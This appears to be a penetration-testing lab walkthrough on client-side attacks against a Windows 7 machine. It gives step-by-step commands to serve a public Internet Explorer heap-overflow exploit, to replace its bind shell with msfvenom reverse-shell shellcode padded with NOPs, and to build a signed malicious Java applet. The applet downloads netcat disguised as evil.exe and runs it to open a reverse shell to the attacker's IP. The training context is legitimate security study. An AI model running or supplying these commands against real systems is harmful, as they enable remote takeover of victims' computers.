CLIENT SIDE ATTACKS
CLIENT SIDE ATTACKS - Overview
The MS12-037 Security Bulletin from microsoft covered a number of serious internet explorer vulnerability. One of them is a heap overflow caused by span attribute. Public exploit were released for this vulnerability (CVE2012-1876) www.exploit-sb.com/exploits/24017/ (Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass). Several version have been archived in the exploit database. The videos use one created by "sickness".
Lets try using this against our windows 7 lab machine and simulate a client side attack.
Examining the code, we see that the exploit uses a bind shell on port 4444. Ideally it would be best to be using a reverse shell. We can keep everything as is and just replace the shell code for a reverse shell of the exact same size if done carefully, this should still work. For the moment though, lets get it to work as is.
Lets start by downloading the code and placing it in our webroot directory on the attacking Kali machine and starting the apache service so that the file is able to be browsed to.
root@kali:~ # cd /var/www/html/
root@kali: # wget -O exploit.html http://www.exploit-db.com/download/24017
root@kali: # service apache2 start
Connect to the windows 7 lab machine and then perform a netstat command to see if anything is on port 4444 where the bind shell will start listening.
C:\>netstat -an|find "4444"
With nothing listening on port 4444, we will browse to the exploit:
The first time the page loads may produce an error. Try to refresh or reload the page if this does occur. Then check the netstat command once more for anything listening on port 4444. If there is now a listener setup on port 4444, then the exploit is likely to have succeeded and we can then try to connect to the lab machine from the attacking kali machine using netcat.
Since the code uses a bind shell, we need to ensure that the windows firewall is turned off.
Now we can connect and get a bind shell (when the firewall is off.)
root@kali: # nc -v 10.11.25.139 4444
CLIENT SIDE ATTACKS - Replacing Shellcode (Swap Bind shell of 342 bytes for reverse tcp shell code of 324 bytes + 18 nops)
Trying to connect to the bind shell fails while the windows firewall is switched on. In order to get past the firewall, we need to swap out the bind shell for a reverse shell of the same size that comes out over port 443.
looking at the shellcode format in the exploit:
# nano /var/www/html/exploit.html
We will use msfvenom to generate a unicode formatted shellcode.
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.179 LPORT=443 -f js_le --platform windows -a x86 -e generic/none
The shellcode generated is 324 bytes long. A quick calculation shows that this is 18 bytes smaller than the bind shell that we will replace.
# echo 342-324|bc
Since the new code is smaller than the existing code, we can replace the old shell code in exploit.html with our code, padding out with 18 nops. In unicode, 1 nop will be %u9090.
We now setup the netcat listener on the attacker before running the exploit.html file on the victim.
# nc -lvp 443
Now when the victimm browses to 10.11.0.179/exploit.html, the reverse shell connection is established on the attacking kali machine.
CLIENT SIDE ATTACKS - Malicious Java Applets
This attack targets victims with Java installed and enabled in their browsers.
Using the code from the manual, I have copied this in to Java.java on the attacker kali machine. This code downloads and executes a given file.
We will modify this code to download netcat from our own attacking webserver and then use netcat to send us back a reverse shell from his victim machine.
A line in the code that reads:
f = Runtime.getRuntime().exec("cmd.exe /c " + expath);
Will need to be modified to read:
f = Runtime.getRuntime().exec("cmd.exe /c " + expath + "10.11.0.179 443 -e cmd.exe");
We then proceed to compile the code.
# javac Java.java
# echo “Permissions: all-permissions” > /root/manifest.txt
# jar cvf Java.jar Java.class
Once compiled, I go ahead and sign the Java applet.
# keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123
# jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet
Now we embed the applet in a HTML page.
# echo '' > /var/www/html/java.html
The script will look for evil.exe in our webroot. Below I copy the windows netcat executable in to the webroot and rename it evil.exe
# cp /usr/share/windows-binaries/nc.exe /var/www/html/evil.exe
Now we setup a listener on the Kali Attacking machine on port 443
# nc -lvp 443